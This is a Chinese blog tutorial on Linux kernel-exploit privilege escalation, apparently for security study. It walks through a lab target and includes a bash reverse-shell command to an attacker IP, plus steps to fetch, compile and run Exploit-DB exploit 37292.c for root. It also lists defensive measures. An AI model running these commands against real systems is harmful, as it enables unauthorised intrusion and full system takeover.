Linux提权--内核漏洞提权

已于 2025-02-06 22:34:11 修改
阅读量1.1k 收藏 10
点赞数 44
分类专栏: 网络安全 文章标签: linux 运维 服务器 网络安全 安全 web安全 学习
于 2025-02-03 17:50:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37107430/article/details/145431696
版权

内核漏洞提权是指利用操作系统内核中的漏洞来提升用户权限,尤其是从普通用户权限提升到 root 权限。内核漏洞通常是由于内核代码的错误(如缓冲区溢出、权限控制不当、错误的内存管理等)导致的,这些漏洞一旦被攻击者发现并利用,就能让攻击者获得比预期更高的权限。

一.获取漏洞信息和利用工具

  • searchsploit:离线的 Exploit-DB 工具

    • 介绍:searchsploit​ 是 Exploit-DB 提供的一个离线工具,允许用户在本地查找漏洞利用脚本。这个工具非常适合在没有网络连接的情况下使用。

    • 格式:searchsploit 条件​

      • 示例:searchsploit linux 3.13.0 ubuntu​

        • PS:查找与 Linux 3.13.0​ 和 Ubuntu​ 相关的漏洞。

    • 安装命令:sudo apt install exploitdb​

  • Exploit-DB

    • 介绍Exploit-DB 是一个在线漏洞数据库,包含了成千上万的漏洞利用(exploit)和相关的漏洞信息。可以通过浏览漏洞库来寻找与目标内核版本相关的漏洞。

  • GitHub

    • 介绍:GitHub 是另一个重要的资源,许多漏洞研究人员和安全专家会将他们发现的漏洞利用代码公开在 GitHub 上。你可以通过克隆特定的 GitHub 仓库来获取漏洞利用代码。

  • 搜索引擎

    • 介绍:如果你无法直接从数据库或 GitHub 获取到漏洞信息,可以通过搜索引擎(如 Google)查找更多资源。在 Google 上,你可以通过搜索特定的 CVE 编号来找到漏洞的描述、解决方法和公开的利用代码。例如,搜索 "CVE-2023-0386 exploit" 会给你提供与该漏洞相关的漏洞利用代码、教程和博客文章等。
二.常见的内核漏洞提权方法
  1. CVE 漏洞:许多提权攻击都是针对已知的内核漏洞(CVE)进行的。
  2. 利用内核模块漏洞:攻击者可以通过加载恶意内核模块来绕过内核的安全限制。
  3. 栈溢出:内核中的某些函数未对输入进行适当的边界检查,可能导致栈溢出,从而修改内核空间内的数据结构,进而实现提权。
三.漏洞示例

靶机版本:Ubuntu 12.04

1.获取靶机shell

  1. 攻击机监听端口

    • 命令:nc -nvlp 7771​

  2. 目标主机反向连接

    • 命令:bash -i >& /dev/tcp/192.168.13.130/7771 0>&1​

  3. 连接成功,获取shell

2.信息收集

  1. ​uname -a​

    1. 作用:用于获取操作系统的详细信息,包含内核版本、主机名、操作系统架构等

  2. ​cat /etc/issue​

    • 作用:用于获取操作系统的发行版信息(例如 Ubuntu、CentOS、Debian 等)以及其他系统信息。

  3. cat /proc/version​

    • 作用:用于获取内核版本以及编译时的相关信息,包括内核版本、编译日期、GCC 版本等。
3.查询漏洞

  1. 根据获取到的信息,使用 searchsploit​查询是否存在相关可利用漏洞。

    • 命令:searchsploit linux 3.13.0 ubuntu 12.04​

      • 作用:查找与 Linux 3.13.0 内核版本 和 Ubuntu 12.04 相关的漏洞。
4.漏洞利用

  1. gcc --version​

    • 作用:用于查询目标主机是否存在gcc编译器。

  2. ​locate linux/local/37292.c​

    • 作用:使用 locate​ 命令查找系统中是否存在名为 37292.c​ 的漏洞利用脚本。

  3. cp /usr/share/exploitdb/exploits/linux/local/37292.c .​

    • 作用:将 37292.c​ 文件复制到当前目录。

  4. python -m http.server 7777​

    • 作用:启动一个简单的 HTTP 服务器,监听 7777 端口,用于通过网络传输文件。

  5. ​wget 192.168.13.130:7777/37292.c​

    • 作用:用于从 指定URL​ 处下载名为 37292.c​ 的文件。

  6. ​gcc -o exp 37292.c​

    • 作用:使用 GCC 编译器将 37292.c​ 源代码编译成名为 exp​ 的可执行文件。

  7. chmod 777 exp​

    • 作用:赋予名为exp的可执行文件所有用户的读、写、执行权限。

  8. ./exp​

    • 作用:运行当前目录下的名为 exp​ 可执行程序。
四.防护措施
  • 定期更新内核补丁:及时安装已知漏洞的补丁,修复已知漏洞,减少被攻击的风险。
  • 启用内核的安全选项:如 SELinux、AppArmor 等可以限制攻击者通过内核漏洞进行的恶意操作。
  • 启用 Kernel ASLR:地址空间布局随机化(ASLR)是一种防止攻击者通过已知地址访问内存的技术。
升:利用Linux漏洞
qq_68163788的博客
02-13 2925
Linux漏洞是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的限。这种方法通常被黑客用来获取系统管理员限,从而可以对系统进行更深入的攻击和控制。 一种常见的Linux漏洞方法是利用内核漏洞内核是操作系统的核心部分,负责管理系统的资源和供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的限。
Linux内核漏洞
m0_74282605的博客
03-30 1060
在渗透过程中,有时利用某些漏洞可以获取一个低限的用户,然后想办法,升到root用户限,从而控制整个系统。在获取到低限shell后,通常会检查操作系统的发行版本、内核版本,老版本的系统可能会存在一些漏洞,于是我们可以利用这些版本漏洞进行。下面给大家带来的是一些内核的例子。今天简单向大家讲解了利用内核漏洞去进行的操作,可以发现内核漏洞最主要的就是信息获取后寻找对应的内核漏洞再去攻击,因为内核漏洞有很多所以就挑出了两个常见而且常用的来给大家演示一下,如果对本文感兴趣不妨一键三连。
漏洞预警】Linux kernel漏洞(CVE-2024-1086)
热门推荐
qq_18209847的博客
04-08 1万+
Linux内核版本v5.14 – v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,本地低限威胁者可利用该漏洞升为root。加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。
Linux漏洞CVE-2025-27591,从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
03-31 888
各位攻城狮、程序猿们,今天咱们来聊点刺激的!Linux 漏洞 CVE-2025-27591,听说过没?没听过?没关系,今天就带你把它扒个精光!这个漏洞存在于 Below 服务(版本低于 v0.9.0),简单来说,就是因为这个目录太奔放了,限设置成了全局可写,导致任何阿猫阿狗都能往里塞东西。这就好比你家大门钥匙人手一把,想不进贼都难啊!
LINUX内核漏洞
程序员阿飘 的博客
01-11 1716
在渗透过程中,有时利用某些漏洞可以获取一个低限的用户,然后想办法,升到root用户限,从而控制整个系统。在获取到低限shell后,通常会检查操作系统的发行版本、内核版本,老版本的系统可能会存在一些漏洞,于是我们可以利用这些版本漏洞进行。下面给大家带来的是一些内核的例子。今天简单向大家讲解了利用内核漏洞去进行的操作,可以发现内核漏洞最主要的就是信息获取后寻找对应的内核漏洞再去攻击,因为内核漏洞有很多所以就挑出了两个常见而且常用的来给大家演示一下,如果对本文感兴趣不妨一键三连。
Linux内核漏洞(CVE-2016-8655)
wuyaowangchuan的博客
11-23 786
靶场网址 https://www.ichunqiu.com/experiment/detail?id=100192&source=2 操作机:Ubuntu 15.10(内核版本4.2.0) 实验工具 chocobo_root:是本次试验的POC文件,通过执行它来验证漏洞 实验目的 了解漏洞原理 掌握其利用方法 实验内容 漏洞简介 此漏洞可用于从未授进程中执行内核代码,恶意访问者只需要本地普通限,就能利用该漏洞导致拒绝服务(系统奔溃)或升到管理员限。 这个漏洞最早出现于2011年4月19日的代
CVE-2022-0847Linux内核漏洞
qq_49091880的博客
04-12 4667
步骤有点简略,各位师傅见谅
Linux内核漏洞
Android_wxf的博客
03-30 3583
一、漏洞详情 近日,研究人员披露了一个Linux内核本地漏洞,发现在copy_page_to_iter_pipe和 push_pipe函数中,新分配的pipe_buffer结构体成员“flags”未被正确地初始化,可能包含旧值PIPE_BUF_FLAG_CAN_MERGE。攻击者可利用此漏洞向由只读文件支持的页面缓存中的页面写入数据,从而限。该漏洞编号为CVE-2022-0847,因漏洞类型和“DirtyCow”(脏牛)类似,亦称为“DirtyPipe”。 *严正声明:本文仅限于技术讨论与分享
Linux---内核Linux配置错误、定时任务
qq_40012781的博客
07-03 1834
Linux---内核Linux配置错误、定时任务
新版脏牛Linux内核漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致升,因为非特进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
CVE-2016-8655 Linux内核漏洞POC
11-18
CVE-2016-8655 Linux内核漏洞POC
Lampião: 1(Linux-脏牛内核漏洞
weixin_51423993的博客
01-19 3933
靶机环境下载地址https://www.vulnhub.com/entry/lampiao-1,249/ 环境:攻击机:kali虚拟机192.168.76.132 靶机:ip未知 过程:探针目标-CMS漏洞利用-脚本探针漏洞-利用内核 靶机密码也没有,ip也没有 探针目标 靶机和kali在同网段,所以kali用nmap扫描同网段存活主机和其端口 namp 192.168.76.0/24 扫出一个192.168.76.141的主机 继续扫他的端口 nmap -p1 -65535 192.16
Linux--SUID&amp;内核漏洞本地用户
2401_84968693的博客
05-17 1078
目录SUID漏洞成因过程:手工命令探针:参考利用:脚本探针:LinEnum.shtraitorlinuxprivchecker等等…Linux命令的利用:find命令利用nc反弹利用python反弹–棱角内核漏洞本地用户过程:探针项目:命令执行: https://gtfobins.github.io/https://pentestlab.blog/2017/09/25/suid-executables/GitHub - rebootuser/LinEnum: Scripted Local L
(转载)Linux内核漏洞浅析
Kendiv's Box
11-07 3650
Linux内核漏洞浅析文章属性:转载(http://www.xfocus.net/articles/200410/746.html)与Windows相比,Linux被认为具有更好的安全性和其他扩展性能。这些特性使得Linux在操作系统领域异军突起,得到越来越多的重视。随着Linux应用量的增加,其安全性也逐渐受到了公众甚或黑客的关注。那么,Linux是否真的如其支持厂商们所宣称的那样安全呢?本期我
Linux本地内核漏洞复现(CVE-2019-13272)
rizon886的博客
01-16 806
Linux本地内核漏洞复现(CVE-2019-13272) 一、漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数。但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用。 PTRACE_TRACEME获取父进程的凭证,使其能够像父进程一样执行父进程能够执行的各种操作。如果恶意低限子进程使用PTRACE_TRACEME并且该子进程的父进程具有高限,该子进程可获取其父进...
linux内核漏洞(CVE-2022-0847)
墨鱼菜鸡
09-10 382
目录 1.打开kali,新建用户 2.将用户添加到sudoers文件夹中 3.编译a.c 4.找一个具有SUID限的可执行文件,进行 5.执行poc 1.打开kali,新建用户 useradd test1 -p 123456 -d /home/test1 -s /bin/bash 2.将用户添加到sudoers文件夹中 ...
linux系统
weixin_53639243的博客
04-23 1489
uname -a 显示全部系统信息cat /etc/issue 内核信息。此命令也适用于所有的Linux发行版cat /etc/passwd 所有人都可看//aux都是参数a = show processes for all users 显示所有用户的进程u = display the process's user/owner 显示用户x = also show processes not attached to a terminal 显示无控制终端的进程。
linux漏洞内核版本,Linux内核漏洞
weixin_39778003的博客
05-03 347
操作机:Ubuntu 15.10(内核版本4.2.0)chocobo_root:是本次试验的POC文件,通过执行它来验证漏洞漏洞简介此漏洞可用于从未授进程中执行内核代码,攻击者只需要本地普通限,就能利用该漏洞导致拒绝服务(系统奔溃)或升到管理员限。这个漏洞最早出现于2011年4月19日的代码中:[代码地址][[https://github.com/torvalds/linux/commit...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值